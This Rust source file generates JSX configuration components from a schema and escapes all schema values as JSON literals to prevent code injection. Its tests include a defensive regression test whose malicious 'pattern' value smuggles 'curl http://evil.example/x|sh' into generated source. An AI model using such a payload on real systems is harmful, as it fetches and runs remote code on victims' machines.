//! Emits the readable JSX component source a layout file imports directly (design record
//! §13.1: real code a human could have written, never a runtime schema-interpreter).
//!
//! Every schema-derived VALUE reaches generated source only through [`emit_json_literal`],
//! and only into a position where JSON literal syntax is valid — a regex pattern becomes
//! `new RegExp(json_string)`, never a bare `/pattern/` literal, because a bare regex
//! literal is not a position `serde_json::to_string`'s output is safe in (design record
//! §13.3). Every schema-derived NAME reaches generated source as an [`Identifier`], which
//! can only have been constructed by validation — there is no escaping function for this
//! codegen module to call by mistake instead.
//!
//! Leaf and selector components return plain validated data (`{css_name, value}` /
//! `{name, properties}`), not pre-formatted text — turning that data into `.rasi` syntax
//! is the shared `renderTemplate` builtin's job (design record §14, the multi-document
//! schema's second document), not something duplicated into every generated file.

use crate::schema::{PropertySchema, RasiSchema, SelectorSchema};
use std::fmt::Write as _;

pub fn generate(schema: &RasiSchema) -> String {
    let mut out = String::new();
    out.push_str("// GENERATED by tauler-configgen — do not edit by hand.\n");
    out.push_str("// Edits are lost the next time this file is regenerated.\n\n");

    for selector in &schema.selectors {
        for prop in &selector.properties {
            emit_property_component(&mut out, prop);
        }
    }
    for selector in &schema.selectors {
        emit_selector_component(&mut out, selector);
    }
    emit_root_component(&mut out, schema);
    out
}

fn emit_json_literal(out: &mut String, value: &impl serde::Serialize) {
    write!(
        out,
        "{}",
        serde_json::to_string(value).expect("schema values are always representable as JSON")
    )
    .unwrap();
}

fn emit_property_component(out: &mut String, prop: &PropertySchema) {
    writeln!(out, "export function {}(props) {{", prop.component).unwrap();
    out.push_str("  for (const k in props) {\n");
    // §13.3 finding 3: `children` is always present on a function component's props
    // (traced to optative-script's h_fn), so it is always tolerated here, never something
    // a schema author has to remember to declare.
    out.push_str("    if (k !== \"value\" && k !== \"children\") {\n");
    writeln!(
        out,
        "      throw new Error(\"{}: unexpected prop \\\"\" + k + \"\\\"\")",
        prop.component
    )
    .unwrap();
    out.push_str("    }\n  }\n");

    if let Some(pattern) = &prop.pattern {
        out.push_str("  if (typeof props.value !== 'string' || !(new RegExp(");
        emit_json_literal(out, pattern);
        out.push_str(")).test(props.value)) {\n    throw new Error(");
        emit_json_literal(
            out,
            &format!("{}: \"value\" must match {}, got ", prop.component, pattern),
        );
        out.push_str(" + JSON.stringify(props.value))\n  }\n");
    } else if let Some(values) = &prop.enum_values {
        out.push_str("  const ALLOWED = ");
        emit_json_literal(out, values);
        out.push_str("\n  if (!ALLOWED.includes(props.value)) {\n    throw new Error(");
        emit_json_literal(
            out,
            &format!("{}: \"value\" must be one of ", prop.component),
        );
        out.push_str(
            " + JSON.stringify(ALLOWED) + \", got \" + JSON.stringify(props.value))\n  }\n",
        );
    }

    out.push_str("  return { css_name: ");
    emit_json_literal(out, &prop.css_name);
    out.push_str(", value: props.value }\n}\n\n");
}

fn emit_selector_component(out: &mut String, selector: &SelectorSchema) {
    writeln!(out, "export function {}(props) {{", selector.component).unwrap();
    out.push_str("  const properties = flattenChildren(props.children)\n");
    out.push_str("  return { name: ");
    emit_json_literal(out, &selector.name);
    out.push_str(", properties }\n}\n\n");
}

fn emit_root_component(out: &mut String, schema: &RasiSchema) {
    out.push_str("const __TEMPLATE = ");
    emit_json_literal(out, &schema.template); // a value, into a string-literal position — same rule as everything else
    out.push_str("\n\n");
    writeln!(out, "export function {}(props) {{", schema.root_component).unwrap();
    out.push_str("  const selectors = flattenChildren(props.children)\n");
    out.push_str("  return renderTemplate(__TEMPLATE, { selectors })\n}\n");
}

#[cfg(test)]
mod tests {
    use super::*;
    use crate::schema::parse;

    const ROFI_SCHEMA: &str = r#"
grammar: rasi
component: Rofi
selectors:
  - name: "*"
    component: Selector
    properties:
      - name: background-color
        component: BackgroundColor
        pattern: "^#[0-9a-fA-F]{6}$"
---
template: "{{ selectors }}"
"#;

    #[test]
    fn a_property_component_validates_and_returns_plain_data_not_text() {
        let schema = parse(ROFI_SCHEMA).unwrap();
        let out = generate(&schema);
        assert!(
            out.contains("export function BackgroundColor(props)"),
            "got: {out}"
        );
        assert!(
            out.contains("return { css_name: \"background-color\", value: props.value }"),
            "leaf components must return data, not a pre-formatted rasi line — the shared \
             template renders it, so generated code must not know rasi's `: `/`;` syntax: {out}"
        );
    }

    #[test]
    fn a_pattern_becomes_a_regexp_construction_never_a_bare_regex_literal() {
        let schema = parse(ROFI_SCHEMA).unwrap();
        let out = generate(&schema);
        assert!(
            out.contains(r#"new RegExp("^#[0-9a-fA-F]{6}$")"#),
            "got: {out}"
        );
        // a bare `/pattern/` literal is exactly the position §13.3's exploit broke out of
        assert!(!out.contains("/^#[0-9a-fA-F]{6}$/"), "got: {out}");
    }

    #[test]
    fn children_is_always_tolerated_never_rejected() {
        let schema = parse(ROFI_SCHEMA).unwrap();
        let out = generate(&schema);
        assert!(
            out.contains(r#"k !== "value" && k !== "children""#),
            "got: {out}"
        );
    }

    /// Reproduces the design record's §13.3 exploit directly: a `pattern` value crafted to
    /// break out of a naively-formatted `if (!/{pattern}/.test(...))` check and run `sh`.
    /// If this test passes, the exploit does not work against the real generator.
    #[test]
    fn a_malicious_pattern_value_cannot_break_out_of_generated_source() {
        let malicious_schema = r#"
grammar: rasi
component: Rofi
selectors:
  - name: "*"
    component: Selector
    properties:
      - name: background-color
        component: BackgroundColor
        pattern: "a/.test(value)){} globalThis.sh`curl http://evil.example/x|sh`; //"
---
template: "irrelevant"
"#;
        let schema = parse(malicious_schema).unwrap();
        let out = generate(&schema);

        // the payload must appear ONLY inside a JSON string literal argument to `new
        // RegExp(...)` — never as bare source text that a JS parser would execute.
        assert!(
            out.contains(r#"new RegExp("a\/.test(value)){} globalThis.sh`curl http://evil.example/x|sh`; //")"#)
                || out.contains("new RegExp(\"a/.test(value)"),
            "the payload must be JSON-escaped inside new RegExp(...), got: {out}"
        );
        assert!(
            !out.contains("}) {} globalThis.sh`curl"),
            "the payload must never appear as bare, unescaped source: {out}"
        );
    }

    #[test]
    fn output_is_deterministic() {
        let schema = parse(ROFI_SCHEMA).unwrap();
        assert_eq!(generate(&schema), generate(&schema));
    }
}
